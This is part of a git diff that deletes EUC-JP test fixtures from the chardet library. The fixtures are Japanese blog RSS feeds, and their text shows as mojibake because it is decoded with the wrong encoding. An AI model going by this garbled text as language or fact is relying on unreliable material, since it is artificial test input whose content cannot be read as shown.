    -²¶₪ף₪ֱ₪ֻ₪ֿ₪₪ְ¥«¥»¥ֳ¥ָ¥ֶ¡¼¥׳₪־¹₪±₪כ¥³¥ף¥₪¬₪¢₪כ₪־₪ַ₪¹₪¬₪ֽ¡©

    - -

    ₪½₪₪₪ִ₪¬₪ַ₪¹₪ט

    - -

    ₪½₪ף₪¿ֶֹ׃₪«₪י₪»₪ֳ₪«₪¯₪₪₪¿₪ְ₪₪₪¿µ®½ֵ₪¥ך¥¢¥כ²»¸»₪ע₪ַ₪¹₪¡©

    - -


    -¿©₪י₪₪¹‏₪₪ה₪¬₪ך₪₪¹₪¿¡¡(-₪״-)

    - -


    -₪₪ף₪«¥ֶ¡¼¥׳ֱֶ‏₪·₪ֶ¥ך¥ג¥³¥ף₪־¥¹¥₪¥ֳ¥ֱ²¡₪·₪ֶ₪µ₪¢₪µ₪¢¡¢₪ָ₪«ֲװ₪ֳ₪ֶ₪₪₪¿₪ף₪ַ₪¹₪¬

    - -

    ¡״₪«₪ֱ₪ד¡¡ִ ¡״₪«₪ֱ₪ד₪ֳ¡¡ִ
    -₪ָ₪«₪₪₪¦₪ְ₪±₪ַ°ל¸‏₪ֻ»ֿ₪₪ך₪₪»₪ף

    - -

    ₪½₪־₪¦₪ֱ₪ֻ ¡״₪ױ¡₪ֳ₪ֶָ°₪¯₪־₪ע₪ה₪ב
    -₪¿₪ְ₪¸₪ֳ₪ְֵָ₪±₪µ₪־ֳז₪ֻֽֿ₪±¹‏₪ף₪ְ₪₪²¶₪ֻ₪·₪׀₪·₪־ְִּ₪ע₪¯₪ל₪₪·₪¿¡ִ

    - -


    -₪½₪³₪ַ

    - -

    ¥ֱ¥ח¥ֳ¥׳₪ַ₪¹₪ט

    - -

    µ₪¹ח₪₪₪ע¹‏₪ב₪ֶ¼׀₪ב45¡כ₪«₪י·ע²נ₪׀₪ך₪־¥ֱ¥ח¥ֳ¥׳°לֱ®¡×

    - -


    -¡¥¡¥¡¥ֶ°₪­₪ְ₪·₪₪·₪¿ ¡¡¡³(¡­¡¼¡®)¥־₪₪´₪ָ¡×

    - -


    -÷£₪־ְ₪₪־ֳז
    -¥¹¥ׁ¥כ¥¿ְ÷¿ְ₪¬¸ֿ³י₪·₪ֶ₪₪₪₪¹
    -₪³₪־ְטְ₪³¦₪¬ִה₪₪כ₪³₪ָ₪₪¯¥ַ¥¸¥¿¥כ²½₪·₪ֶ₪₪₪³₪¦₪ָ₪ג
    -²¶₪ֿ₪³₪־¥ֱ¥ח¥ֳ¥׳°ל₪ִ₪ֵַֿ₪ֳ₪ֶ₪₪₪¯₪ִ₪ג₪ך₪ַ₪¹¡×

    - -

    ₪ֿ₪¡¡ֱ¡¡₪¢¥ֱ¥ח¥ֳ¥׳¡×¥ֱ¥ח¥ֳ¥׳¡×¥ֱ¥ח¥ֳ¥׳!!

    - -

    ¡״₪³₪₪¥³¥י¡¼₪ֳ!!¡ (by ¶¶ֻ¸µַ¯)

    - -


    -¢¨ ₪ֹ₪¦₪ה₪י¹©»צ₪¬»ֿ₪₪ֳ₪¿₪ט₪¦₪ַ₪¹ (KBC)
    -
    -

    ]]>
    -Diary -aristrist -2005-12-20T22:12:09+09:00 -
    - -[ֵם·×»°ַ¯] -http://aristrist.s57.xrea.com/mt/archives/000917.html - ÷£ֶ₪ג¥¹¡¼¥ׁ¡¼₪ַ°ל±ֲ­₪ך₪₪«₪ֳ₪¿¼חֹ״ ֹקֽטָר₪ַ₪¹₪³₪ף₪׀₪ף₪ן(T_T) »׳₪₪₪ג₪«₪±₪÷²ָ₪ֲֻנַ״₪¬₪ה₪ֳ₪ֶ₪­₪¿₪ך₪¹₪כ₪־₪ֳ₪ֶ´ע₪·₪¯₪₪₪₪ַ₪¹₪«¡© ₪¿₪ָ₪¨¼«¬₪ֳַם¸₪·₪¿₪ג₪־₪¬ֶֿ₪₪₪¿₪ָ₪·₪¿₪ֳ₪ֶ´ע₪·₪₪₪־₪ֻ ²ֲָ²₪הֽ§¿ֽ₪«₪י¡¢₪ג₪·₪¯₪ֿ·¾₪ֵֻצ₪¿₪ֳ₪¿₪ך₪₪ֹ ֱֶֽ³ֲנַ״₪־·»₪ֱ₪ד₪ף₪¬₪­₪ֶ²×₪עֶֿ₪±₪¿₪ך₪·₪ֶ₪¯₪ל₪¿₪י ₪ג₪¦¥ן¥¯¥ן¥¯₪·₪₪¹¡£ ₪½₪ף₪ָאֵש₪ֿ ¿ְ®₪־¥µ¥ף¥¿¥¯¥ם¡¼¥¹ ₪ָ¸ֶ₪ף₪ַ₪ג₪₪₪₪₪ף₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«£ק ¡״₪¢₪ף₪¿¡₪ָ¸ֶ₪₪כ´״·¸₪¬¹¥₪­₪ַ₪¹ ₪ָ₪ֶ₪ג¿ֶּ©₪ֻ₪₪ל₪¿µ₪₪¬₪¹₪כ₪־₪ַ₪¹ ְ₪₪־ֳז₪ֻ₪ֿ₪½₪¦¸ֶ₪׀₪ל₪כ₪־₪¬·ש₪₪₪¿ֽ₪ג₪₪₪כ₪ַ₪·₪ח₪¦₪¬ ¥ן¥¿¥·₪ֿ¹¥₪­₪₪־₪ַ₪¹ ֳֶ₪ֻ¼«¬₪ט₪ךַ¯¾ו₪־ֽ§¿ֽ₪ע₪½₪¦¸ֶ₪₪כ(¸ֶ₪׀₪»₪ֶ₪ג₪י₪¨₪כ)₪־₪ֿ´מ₪׃₪ַ₪¹ ₪½₪־¿ֽ₪־´ן₪־ֲח₪­₪µ₪ג´¶₪¸₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹ ֳ¯₪ַ₪ג₪½₪¦¸ֶ₪₪כ´״·¸₪ַ₪¢₪כ₪ן₪±₪ַ₪ֿ₪¢₪ך₪₪»₪ף ¥ן¥¿¥·₪¬·ֹ°¦₪¹₪כ¿ֽ₪ַ₪₪±₪ל₪׀₪½₪ף₪¸ֶ₪׃‎₪ֿ₪·₪₪₪₪ַ₪·₪ח₪¦₪· ₪₪¿·ֹ°¦₪·₪ֶ₪₪₪ֶ₪ג₪½₪־¸ֶ₪׃‎₪¬₪·₪ֳ₪¯₪ך₪³₪₪₪¿ֽ₪ג₪₪₪₪¹ ¥ן¥¿¥·₪ֿ₪³₪ל₪«₪י₪ג₪½₪¦¸ֶ₪׀₪»₪ֶ₪ג₪י₪¨₪כ ₪ג₪·₪¯₪ֿ¸ֶ₪ף₪ַ₪ג₪י₪¨₪כֽ§¿ֽ₪ע°ל¿ֽ₪ַ₪גֲ¿₪¯»‎₪ֱ₪¿₪₪₪ָ»׳₪₪₪₪¹¡£ ¡״₪¢₪ף₪¿¥µ¥₪¥³¡¼₪ְ₪ט¡×¡ ¢¨ ¡״₪ײ»ׂ₪גַה₪ֳ₪ֶ₪כ₪¥¡¼£ק¡ ¢¬°לָײ²¼ֳ₪ֻ¥­¥ֳ¥ָ¥«¥ֳ¥ָ¡ץ¥ֱ¥ֳ¥׳¥¹¥¿¡¼... - - -

    ÷£ֶ₪ג¥¹¡¼¥ׁ¡¼₪ַ°ל±ֲ­₪ך₪₪«₪ֳ₪¿¼חֹ״ ֹקֽטָר₪ַ₪¹₪³₪ף₪׀₪ף₪ן(T_T)

    - -


    -»׳₪₪₪ג₪«₪±₪÷²ָ₪ֲֻנַ״₪¬₪ה₪ֳ₪ֶ₪­₪¿₪ך₪¹₪כ₪־₪ֳ₪ֶ´ע₪·₪¯₪₪₪₪ַ₪¹₪«¡©
    -₪¿₪ָ₪¨¼«¬₪ֳַם¸₪·₪¿₪ג₪־₪¬ֶֿ₪₪₪¿₪ָ₪·₪¿₪ֳ₪ֶ´ע₪·₪₪₪־₪ֻ
    -²ֲָ²₪הֽ§¿ֽ₪«₪י¡¢₪ג₪·₪¯₪ֿ·¾₪ֵֻצ₪¿₪ֳ₪¿₪ך₪₪ֹ
    -ֱֶֽ³ֲנַ״₪־·»₪ֱ₪ד₪ף₪¬₪­₪ֶ²×₪עֶֿ₪±₪¿₪ך₪·₪ֶ₪¯₪ל₪¿₪י
    -₪ג₪¦¥ן¥¯¥ן¥¯₪·₪₪¹¡£

    - -

    ₪½₪ף₪ָאֵש₪ֿ
    -¿ְ®₪־¥µ¥ף¥¿¥¯¥ם¡¼¥¹ ₪ָ¸ֶ₪ף₪ַ₪ג₪₪₪₪₪ף₪ַ₪ֿ₪₪₪₪ַ₪·₪ח₪¦₪«£ק

    - -


    -¡״₪¢₪ף₪¿¡₪ָ¸ֶ₪₪כ´״·¸₪¬¹¥₪­₪ַ₪¹
    -₪ָ₪ֶ₪ג¿ֶּ©₪ֻ₪₪ל₪¿µ₪₪¬₪¹₪כ₪־₪ַ₪¹
    -ְ₪₪־ֳז₪ֻ₪ֿ₪½₪¦¸ֶ₪׀₪ל₪כ₪־₪¬·ש₪₪₪¿ֽ₪ג₪₪₪כ₪ַ₪·₪ח₪¦₪¬
    -¥ן¥¿¥·₪ֿ¹¥₪­₪₪־₪ַ₪¹

    - -

    ֳֶ₪ֻ¼«¬₪ט₪ךַ¯¾ו₪־ֽ§¿ֽ₪ע₪½₪¦¸ֶ₪₪כ(¸ֶ₪׀₪»₪ֶ₪ג₪י₪¨₪כ)₪־₪ֿ´מ₪׃₪ַ₪¹
    -₪½₪־¿ֽ₪־´ן₪־ֲח₪­₪µ₪ג´¶₪¸₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹

    - -

    ֳ¯₪ַ₪ג₪½₪¦¸ֶ₪₪כ´״·¸₪ַ₪¢₪כ₪ן₪±₪ַ₪ֿ₪¢₪ך₪₪»₪ף
    -¥ן¥¿¥·₪¬·ֹ°¦₪¹₪כ¿ֽ₪ַ₪₪±₪ל₪׀₪½₪ף₪¸ֶ₪׃‎₪ֿ₪·₪₪₪₪ַ₪·₪ח₪¦₪·
    -₪₪¿·ֹ°¦₪·₪ֶ₪₪₪ֶ₪ג₪½₪־¸ֶ₪׃‎₪¬₪·₪ֳ₪¯₪ך₪³₪₪₪¿ֽ₪ג₪₪₪₪¹

    - -

    ¥ן¥¿¥·₪ֿ₪³₪ל₪«₪י₪ג₪½₪¦¸ֶ₪׀₪»₪ֶ₪ג₪י₪¨₪כ
    -₪ג₪·₪¯₪ֿ¸ֶ₪ף₪ַ₪ג₪י₪¨₪כֽ§¿ֽ₪ע°ל¿ֽ₪ַ₪גֲ¿₪¯»‎₪ֱ₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡״₪¢₪ף₪¿¥µ¥₪¥³¡¼₪ְ₪ט¡×¡

    - -


    -¢¨ ¡״₪ײ»ׂ₪גַה₪ֳ₪ֶ₪כ₪¥¡¼£ק¡

    - -
    ¢¬°לָײ²¼ֳ₪ֻ¥­¥ֳ¥ָ¥«¥ֳ¥ָ¡ץ¥ֱ¥ֳ¥׳¥¹¥¿¡¼]]>
    -Imagine -aristrist -2005-12-19T23:58:13+09:00 -
    - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/artifact-jp.com.xml b/chardet/tests/EUC-JP/artifact-jp.com.xml deleted file mode 100644 index ec01d31..0000000 --- a/chardet/tests/EUC-JP/artifact-jp.com.xml +++ /dev/null @@ -1,108 +0,0 @@ - - - - - - ARTIFACT ¡¿ֽ¹©»צ¼ֲ¡ - http://artifact-jp.com/ - ¥×¥¿¥¯¸²½¹ֽ»¡¥µ¥₪¥ָ - ja - kanose@jp.org - Fri, 16 May 2003 19:29:16 +0900 - - - Linux₪ֶַ°÷מ₪¹₪כTVֿ¿²ט¥µ¡¼¥׀¡¼₪־¥¥¢¥¡¼¥ף¥»¥ֳ¥ָ - http://artifact-jp.com/mt/archives/000486.html - ´כ¶ָ₪ַ₪ֿ₪₪¯¸ִ¿ֽ₪ֻ₪ט₪כ₪ג₪־¡£DivX·ֱ¼°₪ַֿ¿²ט - - - - HDD¥DVD¥ל¥³¡¼¥ְ¡¼₪־¥ל¥׃¥ו¡¼ - http://artifact-jp.com/mt/archives/000485.html - DOS/V magazine₪ָWPC ARENA₪־¥ל¥׃¥ו¡¼µ­»צ - - - - ¥ׁ¥½¥³¥ףִּ¿®₪ָ¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־¶¦ֲ¸»‏ֲו - http://artifact-jp.com/mt/archives/000484.html - ¡¡ֱ°₪־¡ײ¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ½י´₪ֻ³טּצ₪·₪ֶ₪₪₪¿¸ִ¿ֽ¡׳₪ֻ₪ֿ₪ה₪±₪ָֻ¿±‏₪¬₪¢₪ֳ₪ֶ₪׃₪ֳ₪¯₪ך₪·₪₪·₪¿₪¬¡¢½י´₪«₪י¥ֽ¥ֳ¥ָ₪ה₪ֳ₪ֶ₪₪₪כ¿ֽ₪ֿ·כ¹½ֲ¿₪₪₪ף₪ַ₪¹₪ֽ¡£₪³₪־₪»₪₪₪«¡¢MovableType₪ע»ָ₪ֳ₪ֶ₪₪₪כ¿ֽ₪ַֿ¯־נ₪¬¹ג₪₪₪ָ₪₪₪¦ְג₪¬½׀₪ֶ₪כ₪·¡¾׀¡ֻ¡£ ½ׁ¼װ₪־ְ₪³¦: ְ®½ֱֿ°₪־¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ ¡¡¥¢¡¼¥ֶ¥£¥¹¥ָ₪¬¸ר¼°¥µ¥₪¥ָ₪ע»ֿ₪ב₪¿₪־₪ַ¥ױ¥¡¥ף₪¬¥µ¥₪¥ָ₪ע¸«₪¿₪₪₪¬₪¿₪ב₪ֻ¡ִ₪ֳ₪ֶ₪־₪ֿ³־₪«₪ֻ₪ט₪¯¸«₪«₪±₪₪·₪¿¡£ֲחֲם±׃°ל»ב°³°₪ְ₪ָ¡¢¿ֲפ¿»ב₪ה¸ְִֵֽ¿»»בױ₪ך₪¬¥ֽ¥ֳ¥ָ₪ְֻׁ¶ֵֻ×₪ְ₪ֳ₪¿₪«₪ָ¡£ ¥³¥ָ₪־»ֿ₪₪ך¡ִ : CYBERBLOCKS. ¡¡HIROMIX₪־ֵ׀¾ל₪ַ1995ַ¯÷¢₪«₪י¼ּ¿¿¥ײ¡¼¥א₪¬₪¢₪ך¡¢¥ַ¥¶¥₪¥¡¼·ֿ¸²½₪ָ¼ּ¿¿¥ײ¡¼¥א₪־¥ך¥ף¥¯₪¬₪¢₪ֳ₪ֶ¡¢₪½₪־־®₪ל₪ֻWeb₪ג₪־₪ֳ₪¿₪ף₪ַ₪·₪ח₪¦₪ֽ¡£ highbiscus: ¥ֽ¥ֳ¥ָ³¦ְ־ֳֿ ¡¡³¨ֱֹ₪­₪ֻ´״₪·₪ֶ₪ֿ¡¢₪½₪־¥ֶ₪־¥³¥¥ו¥ֻ¥ֶ¥£¡CAT-NET¡¢ֵלµ‏BBS₪₪ֹ¡ֻ₪ֻ₪ֹ₪ֳ₪׳₪ך»ָ₪ֳ₪ֶ₪₪₪¿₪ף₪ַ¡¢¼ֲ÷₪ֹ₪־ִרֵ₪־±ֶ¶ֱ־ֿ₪¬₪¢₪ֳ₪¿₪־₪«₪ֿµׂ´ֵׁ×₪ֻ₪ֿ₪₪ל₪₪₪₪ָ»׳₪₪¡¢¿¨₪ל₪₪»₪ף₪ַ₪·₪¿¡£ ¡¡₪ָ₪ֿ₪₪₪¨¡¢³¨ֱֹ₪­¥ֽ¥ֳ¥ָ¾נף₪ֿ¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ¾ו₪ֻµ­ֿ¿₪¬₪₪₪₪־₪ַ¡¢¼«¬₪־µ­²±₪־ָֿ°ֿ₪ַµ­ֿ¿₪·₪ֶ₪×₪­₪₪¹¡£... - - - - ¥¢¥¯¥»¥¹²עְֿ₪־ֳֶּ»כ - http://artifact-jp.com/mt/archives/000483.html - ¡¡₪¢₪כ¥ך¥ף¥¯½¸₪ע¸«₪ֶ₪₪₪¿₪י¡¢Infoseek₪־¥¢¥¯¥»¥¹²עְֿ₪ע₪ִ₪±₪ֶ₪₪₪כ¥µ¥₪¥ָ₪״₪־¥ך¥ף¥¯₪ֻ₪ן₪¶₪ן₪¶¡ײ¥ך¥ף¥¯²עְֿ₪¢₪ך¡׳₪ָ½ס₪₪₪ֶ₪¢₪ֳ₪ֶ¡¢₪ֱ₪ח₪ֳ₪ָֹװ»׳µִ₪µ₪»‎₪ֱ₪ֻ¡£ ¡¡¥ֹ¥ב¥₪¥ף₪ע₪ָ₪ֳ₪ֶ₪₪₪כ¥µ¥₪¥ָ₪₪י¥¢¥¯¥»¥¹¥ם¥°₪ֿ¥µ¡¼¥׀¡¼₪¬¼ט₪ֳ₪ֶ₪₪₪כ₪·¡¢¥¢¥¯¥»¥¹²עְֿCGI₪ֿ₪ן₪¶₪ן₪¶ֹ½¼¨₪·₪₪₪₪·¡¢Infoseek₪־¥¢¥¯¥»¥¹²עְֿ₪ְ₪±ֳֶּ»כ₪¹₪כֽ‎ֽ³₪¬₪ן₪«₪י₪₪₪₪ף₪ַ₪¹₪¬¡¢ֳ±₪ֻµ»½ֵׁ×ּµֳ־₪«₪י₪¯₪כ₪ף₪ַ₪·₪ח₪¦₪«₪ֽ¡£... - - - - ReadMe!JAPAN₪ֵֻ׀ֿ¿₪·₪ֶ₪₪₪כWeblog¥µ¥₪¥ָ₪ֿ¾¯₪₪₪ - http://artifact-jp.com/mt/archives/000482.html - simpl-e-blog 5/15 ¡¡₪³₪³₪ַWeblog¥ײ¡¼¥א₪־²׀ֹױ₪±ּעֵ×ֲ¸÷₪עֳµ₪¹₪¿₪ב₪ֻ¡¢ReadMe! JAPAN¾ו°ּ₪־¥µ¥₪¥ָ₪ע¸«₪ֶ¡¢ARTIFACT₪ע¸«₪ִ₪±₪כ¡ִ₪ָ₪₪₪¦₪³₪ָ₪¬½ס₪«₪ל₪ֶ₪₪₪¿₪ף₪ַ₪¹₪¬¡¢₪ג₪ָ₪ג₪ָMovableType₪ע»ָ₪ֳ₪ֶ₪₪₪כ¥µ¥₪¥ָ₪ַReadme!₪ֵֻ׀ֿ¿₪·₪ֶ₪₪₪כ¥µ¥₪¥ָ₪ֿ¾¯₪₪₪₪ָ₪₪₪¦°ץ¾₪¬₪¢₪ך₪₪¹¡£÷ַ¶בMovableType₪ע»ָ₪ֳ₪ֶblog₪ע»ֿ₪ב₪ֶ¡ִ₪ָ₪₪₪¦¿ֽ₪ֿ¡¢ReadMe!₪־ֲ¸÷₪µ₪¨ֳ־₪י₪₪₪₪־₪ַ₪ֿ₪₪₪₪«₪ָ¡£ ¡¡¼«¬₪ֿ¡¢ְ־₪«₪יReadMe!₪ֵֻ׀ֿ¿₪·₪ֶ₪₪₪¿₪־₪ַ¡¢¥µ¥₪¥ָ₪ע÷ֶ³«₪·₪¿»‏₪ֶֻ‏₪ל₪ֶ₪₪₪·₪¿₪¬¡¢½ה²ף₪·₪ֶ₪₪₪כ¥µ¥₪¥ָ₪ַMovableType₪־¥µ¥₪¥ָ₪ֻ¸ֲ₪י₪÷¡¢ReadMe!JAPAN₪ֵֻ׀ֿ¿₪·₪ֶ₪₪₪כ¥µ¥₪¥ָ₪ֿ·כ¹½¾¯₪₪¯₪₪ֳ₪ֶ₪­₪ֶ₪₪₪כµ₪₪¬₪·₪₪¹¡£tDiary₪הhns₪₪ֹ₪־¥ִ¡¼¥כ₪ע»ָ₪ֳ₪ֶ₪₪₪כ¿ֽ₪ֿReadMe!JAPAN₪ֵֻ׀ֿ¿₪·₪ֶ₪₪₪₪₪·¹¸‏₪¬¶¯₪₪₪·¡£ ¡¡Readme!₪ְ₪±₪ֻ¸ֲ₪ל₪׀¡¢₪×₪½₪י₪¯A-news₪¬°לָײ¥·¥§¥¢₪¬¹ג₪¯₪ֶ¡¢¼«÷מ¥ִ¡¼¥כ־¨₪ג·כ¹½¹ג₪½₪¦¡£... - - - - ·׀÷ׁ»÷¶ָ¾₪־¿ֽ₪־ֳֿ₪ֻ¥³¥¥±₪¬ - http://artifact-jp.com/mt/archives/000481.html - ¥³¥י¥א it@RIETI : ¥ב¥¸¥ד¡¼vs¥₪¥ף¥ַ¥£¡¼¥÷? ¡¡·׀÷ׁ»÷¶ָ¾¾¦ּ³¾נףְ¯÷צ¶ֹ¸²½¾נף´״ֿ¢»÷¶ָ²ִ¹ה÷´¡ִ¹₪₪₪ט¡ֻ₪־¶­¿¿־ֹ»ב₪ֻ₪ט₪כ¥³¥י¥א¡£¥³¥¥±₪ע־ד₪ֻ₪·₪ֶ¡¢¥³¥ף¥ֶ¥ף¥ִ»÷¶ָ₪ֻ₪×₪₪₪ֶ¡¢¥ב¥¸¥ד¡¼₪ָ¥₪¥ף¥ַ¥£¡¼¥÷₪ֿ₪׸₪₪ה´°₪¹₪כ´״·¸₪ֻ₪ַ₪­₪כ₪ָ₪₪₪¦ֳֿ¡£¥×¥¿¥¯ֵ×₪ֻ₪ּֿ¿·₪·₪₪ֳֿ₪ַ₪ֿ₪₪₪₪ַ₪¹₪¬¡¢₪³₪¦₪₪₪¦־©¾ל₪־¿ֽ₪¬¸ְ₪¦₪ט₪¦₪ֻ₪₪ֳ₪¿₪ָ₪₪₪¦₪־₪¬¶½ּ£¿¼₪₪₪ַ₪¹¡£ ¡¡÷₪«₪₪ֳֿ₪ע₪₪₪¨₪׀¡¢ּ¡²ט¶ָ³¦₪ֻ₪×₪₪₪ֶ¡¢¥ב¥¸¥ד¡¼₪ֿ¾¯ַ¯¥¥¬¥¸¥ף₪¬¥³¥¥±₪ַ¥ײ¡¼¥¹₪ע»‎₪ֳ₪¿₪ך₪¹₪כ₪ט₪¦₪ֻ¥³¥¥±₪ַ÷מ²ָ₪עָ¯·¡₪·₪ֶ₪₪₪¿₪ך₪¹₪כ₪±₪ֹ¡¢½µ´©ּ¡²ט»¨»ן₪ַ¼ֲ÷₪ֻ¥ב¥¬¥ׂ¥ֳ¥ָ÷מ²ָ₪ָ₪₪כ¿ֽ₪¿₪ֱ₪ֿ¡¢¥¢¥·½׀¿ָ₪־¿ֽ₪־₪₪¦₪¬₪₪ְ₪₪ְֲ¿₪₪₪ָ»׳₪₪₪₪¹¡£¥ב¥¸¥ד¡¼₪ָ¥₪¥ף¥ַ¥£¡¼¥÷₪־ֳז´ײ₪°₪י₪₪₪־µ¬ּֿ₪־ּ¡²ט»¨»ן¡10ֹֻפ°²¼₪־·מ´©»ן¡ֻ₪ֻ₪×₪₪₪ֶ₪ֿ¡¢ֶ±¿ֽ»ן¥·¡¼¥ף₪ָּ©ְ₪ֻ´״·¸₪¬₪¢₪ך₪₪¹₪±₪ֹ¡£ ¡¡₪ֻ₪·₪ֶ₪ג¡¢₪³₪־¼ּ¿¿₪ֿ¡״TRICK¡₪־°₪ֹפ´²»ב₪₪¿₪₪₪ַ¸ױ»¶½­₪µ₪¬־צ₪·₪ֶ₪₪¹¡¾׀¡ֻ¡£... - - - - ´ה¸¶ֽµֶף»ב₪¬¥¢¥ב¥³¥₪־÷מ²ט₪עֳ´ֵצ - http://artifact-jp.com/mt/archives/000480.html - Marvel Entertainment - QUEST #1¡¡¡־ֻ¢ֻק₪־ֶ¡¹ 5/2₪ט₪ך¡ֿ ¡¡6/4₪ֻ¥¡¼¥¥כ¥³¥¥ֳ¥¯₪«₪י´ה¸¶ֽµֶף»ב₪¬÷מ²ט₪עֳ´ֵצ₪·₪¿¡״QUEST¡₪ָ₪₪₪¦¥·¥ך¡¼¥÷₪¬½׀₪כ₪½₪¦₪ַ₪¹¡£¥¢¥ב¥³¥₪־÷מ²ט₪עֶֻ¿ֽ÷מ²ָ₪¬ַ₪₪µ₪ל₪כ₪ָ₪₪₪¦₪־₪ֱִֿ₪·₪₪₪ַ₪¹₪ֽ¡£... - - - - ¿·¶½½¡¶µ₪ֶֻ‏₪ֳ₪ֶ₪₪₪כ·ַ½¿ֽ - http://artifact-jp.com/mt/archives/000479.html - ¿·¶½½¡¶µ₪ֶֻ‏₪ֳ₪ֶ₪₪₪כ·ַ½¿ֽ°לֽק ¡¡¥«¥כ¥ָ₪ְֻצַ¾₪µ₪ל₪כ·ַ½¿ֽ₪¬¸µ¥ֽ¥¿?¡¡¹¹₪ֱֻּ₪ֳ₪ֶ¡¢¥¥כ¥³¥¡¼¥ם¼ֲ¼ֱµ´©¹ז₪ֻ÷₪ֳ₪¿¥ך¥¹¥ָ₪ָ₪₪₪¦µ₪₪¬₪·₪₪₪₪ַ₪ג₪₪·¡£... - - - - ±ֱַ÷ְֶ¸µ¡₪ָ₪·₪ֶ₪־PSP - http://artifact-jp.com/mt/archives/000478.html - Game WATCH : E3ִ¾ֱ°¡¦SCE¥ײ¥ך¡¼¥ױ¥£¥ף¥°¸½ֳֿ¥ל¥¡¼¥ָ¡§¿··ֲָ׃¥׳¥י¥ֳ¥ָ¥¡¼¥א¡ײPSP¡׳₪־³«ָ¯₪עµ׳װל־ֹּ¼ִׂ¹₪¬ָ¯ֹ½ ZDNN¡§¥½¥ֻ¡¼¡¢·ֲָ׃¥²¡¼¥אµ¡₪ֻ»²ֶ‏¡£¥­¡¼¥ן¡¼¥ֹ₪ֿ¡ָ21ְ₪µ×₪־¥¦¥©¡¼¥¯¥¥ף¡ֹ ¡¡₪₪ף₪«¥²¡¼¥א¥¥·¥ף₪ָ₪₪₪¦₪ט₪ך¡¢¥¡¼¥¿¥ײ¥כ±ֱַ÷ְֶ¸µ¡₪ָ₪₪₪¦´¶₪¸₪־₪¹₪כ¥¹¥¥ֳ¥¯₪ַ₪¹₪ֽ¡£... - - - - ¹ס»÷RSS¥ך¡¼¥ְ¡¼¡״NewsGlue¡ - http://artifact-jp.com/mt/archives/000477.html - RSS ¥ֻ¥ו¡¼¥¹¥ך¡¼¥ְ¡¼ NewsGlue¡¡¡־NewsGlue - A RSS Reader from Japan [dh's memoranda]₪ט₪ך¡ֿ ¡¡3,000±₪־¥·¥§¥¢¥¦¥§¥¢₪ַ14ֶ´ײ₪ֱֿ´µ¡ַ½₪¬»ָ₪¨₪כ₪½₪¦₪ַ₪¹¡£₪³₪ל₪ג¡¢.NET Framework₪־¥₪¥ף¥¹¥ָ¡¼¥כ₪¬ֹ¬ֽ׳₪ַ₪¹¡£ ¡¡´ֶֹ₪ָ¸ו₪ֶַֹ₪א₪ג₪־₪ע¥ֱ¥§¥ֳ¥¯₪·₪ֶ¿¶₪ך¬₪±₪ֶ¥¿¥₪¥ָ¥כֹ½¼¨₪ַ₪­₪כµ¡ַ½₪ֿ״ֽר₪½₪¦¡£ ¡¡NewsGlue₪«₪י¥µ¥₪¥ָ₪ע¸«₪ט₪¦₪ָ₪¹₪כ₪ָ¡¢¥ַ¥ױ¥©¥כ¥ָ₪־¥ײ¥י¥¦¥¶₪ע¸ֶ₪׃½׀₪¹₪ט₪¦₪ֻ₪₪ֳ₪ֶ₪₪₪ֶ¡¢SharpReader₪־₪ט₪¦₪ֻ¥¢¥׳¥ךֶג₪־¥¦¥£¥ף¥ֹ¥¦₪ַֹ½¼¨₪·₪ֶ₪¯₪ל₪כּץ₪ַ₪ֿ₪₪₪ױ₪ך₪¬ָשּ¯₪»ֵֽֽ¡£ ¡¡¼«¬₪ָ₪·₪ֶ₪ֿ¡¢SharpReader₪«₪י¾ט₪ך´¹₪¨₪כ₪₪ֹ₪ַ₪ֿ₪₪«₪ֳ₪¿₪ַ₪¹¡£... - - - - ¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ½י´₪ֻ³טּצ₪·₪ֶ₪₪₪¿¸ִ¿ֽ - http://artifact-jp.com/mt/archives/000476.html - ½י´¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪ְֿלְֽׁ‏₪־₪¢₪כֲח³״₪ה´כ¶ָ₪־¿ֽ₪¿₪ֱ₪¬³טּצ₪·₪ֶ₪₪₪¿ - - - - ·¦ִֽֽ־²נ₪¬¼«ֳר₪ֲַחֻד־י»¿₪·₪ֶZAKZAK₪ֳֻ¡₪«₪ל₪כ - http://artifact-jp.com/mt/archives/000475.html - ·¦ִֽֽ־²נ¡¢ֶַֽ¡¡ײֲחֻד¡׳־י»¿₪־ֹװ²ִ»׳µִ ¡¡·¦ִֽ¥¦¥©¥ֳ¥ֱ¥ד¡¼₪ָ₪·₪ֶ¥¯¥ך¥ֳ¥׳¡£ ¡¡¹װֶ°¿´ֽ‎³״₪־ֶג»³´מµ׳ֽ÷¡¦ֲֳַָחּ¾ְֽ¶µ¼ר₪¬¡ײ´ס₪ע₪ֶ₪י₪ֳ₪¿₪־₪«₪ג₪·₪ל₪₪₪₪¬¡¢ֻ¡־§₪ֲַּּ₪ְ₪ָ·ט₪₪ֳ₪ֶ₪₪₪כ¡£ֻ¡־§₪ָ₪₪₪¦₪־₪ֿ°ו³״ֵס¢²³״ֵ×÷¬µע₪¬₪¢₪ֳ₪ֶ·ט₪₪ֳ₪ֶ₪₪₪כ₪ג₪־¡£ָ¿¼ׂ²סֵ×₪ָ₪₪₪¨₪כ¡׳₪ָ¸ְ₪ֳ₪ֶ₪₪¹₪¬¡¢₪³₪־¶µ¼ר₪ֿ¥×¥י¥ף¥ְ₪ָ₪«ֲחֻד₪¬¹חֻ¡₪־¹ס₪¬₪¢₪כ₪³₪ָ₪עֳ־₪י₪₪₪₪ף₪ַ₪¹₪«₪ֽ¡£ֻדְ¸ְי¾½»ב₪ֿ₪₪₪ִ₪ג₪־ִ´»ׂ₪₪־₪ַ₪ֹ₪¦₪ַ₪ג₪ט₪·¡£ ¡¡₪³₪ף₪¿ֽ₪¿₪ֱ₪ָָז₪₪ל₪׀¡¢·¦ִֽ₪־₪₪¦₪¬¼«¬₪ַ¹ֽ₪¨₪ט₪¦₪ָ₪·₪ֶ₪₪₪כ¬¡¢¹¥´¶₪¬»‎₪ֶ₪₪¹¡£ 